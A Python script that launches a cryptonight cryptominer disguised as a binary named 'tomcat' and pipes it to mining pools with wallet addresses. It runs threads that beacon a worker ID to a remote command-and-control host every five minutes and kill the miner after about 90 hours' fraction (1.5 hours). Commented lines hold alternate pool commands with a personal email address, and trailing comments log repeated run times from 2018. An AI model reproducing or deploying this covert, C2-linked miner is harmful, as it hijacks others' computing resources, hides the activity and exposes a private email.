import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:06.088775
#2018-02-17 15:56:01.871829
#2018-02-17 17:45:01.719821
#2018-02-17 19:34:06.030005
#2018-02-17 21:22:07.321639
#2018-02-17 23:06:06.509204
#2018-02-18 00:53:07.031631
#2018-02-18 02:41:03.937055
#2018-02-18 04:29:06.348363
#2018-02-18 06:21:07.996239
#2018-02-18 08:10:05.549615
#2018-02-18 09:58:04.948667
#2018-02-18 11:46:04.615070
#2018-02-18 13:30:05.295127
#2018-02-18 15:20:06.708476
#2018-02-18 17:09:01.544625
#2018-02-18 18:57:01.693120
#2018-02-18 20:44:01.603914
#2018-02-18 22:28:07.009182
#2018-02-19 00:17:06.061245
#2018-02-19 02:03:06.382541
#2018-02-19 03:51:03.773879
#2018-02-19 05:35:06.697688
#2018-02-19 07:23:03.732165
#2018-02-19 09:12:05.307285
#2018-02-19 11:03:01.219789
#2018-02-19 12:49:07.280210
#2018-02-19 14:38:06.703098
#2018-02-19 16:25:07.525521
#2018-02-19 18:14:02.124851
#2018-02-19 20:00:12.117147
#2018-02-19 21:49:01.658358
#2018-02-19 23:35:04.069704
#2018-02-20 01:20:08.338460
#2018-02-20 03:12:01.982066
#2018-02-20 04:59:05.770389
#2018-02-20 06:42:06.229496
#2018-02-20 08:28:01.785177
#2018-02-20 10:13:05.038471
#2018-02-20 11:57:07.238538
#2018-02-20 13:44:05.905471
#2018-02-20 15:31:01.591097
#2018-02-20 17:18:05.518440
#2018-02-20 19:07:04.313871
#2018-02-20 20:57:06.346482
#2018-02-20 22:43:05.472754
#2018-02-21 00:26:03.760135
#2018-02-21 02:12:07.004430
#2018-02-21 03:58:05.951048
#2018-02-21 05:47:01.947287
#2018-02-21 07:35:06.565527
#2018-02-21 09:20:01.344385
#2018-02-21 11:08:07.159044
#2018-02-21 12:55:06.816592
#2018-02-21 14:42:08.057666
#2018-02-21 16:28:07.245116
#2018-02-21 18:18:09.427708
#2018-02-21 20:03:06.323557
#2018-02-21 21:49:06.192973
#2018-02-21 23:36:05.272028
#2018-02-22 01:26:05.680864
#2018-02-22 03:15:09.686412
#2018-02-22 05:03:06.870136
#2018-02-22 06:46:06.525176
#2018-02-22 08:33:04.650462
#2018-02-22 10:20:09.303663
#2018-02-22 12:07:08.587804
#2018-02-22 13:52:07.845428
#2018-02-22 15:41:08.347298
#2018-02-22 17:27:03.887180
#2018-02-22 19:14:07.188480
#2018-02-22 21:06:05.678060
#2018-02-22 22:50:09.842866
#2018-02-23 00:37:01.389465
#2018-02-23 02:23:06.718880
#2018-02-23 04:11:07.671623
#2018-02-23 05:57:04.078944
#2018-02-23 07:58:03.199950
#2018-02-23 10:17:06.546262
#2018-02-23 12:07:06.015694
#2018-02-23 13:54:04.322762
#2018-02-23 15:45:07.528881
#2018-02-23 17:31:04.589344
#2018-02-23 19:19:07.630228
#2018-02-23 21:03:04.062577
#2018-02-23 22:47:06.600391
#2018-02-24 00:34:06.469990
#2018-02-24 02:25:06.905819
#2018-02-24 04:14:04.799169
#2018-02-24 06:02:05.143790
#2018-02-24 07:49:01.692189
#2018-02-24 09:34:01.546705
#2018-02-24 11:27:04.463546
#2018-02-24 13:16:01.843515
#2018-02-24 15:06:07.381838
#2018-02-24 16:55:01.374478
#2018-02-24 18:43:04.344113
#2018-02-24 20:33:01.874016
#2018-02-24 22:33:07.646360
#2018-02-25 02:50:06.364182
#2018-02-25 06:23:05.484076
#2018-02-25 11:39:01.933802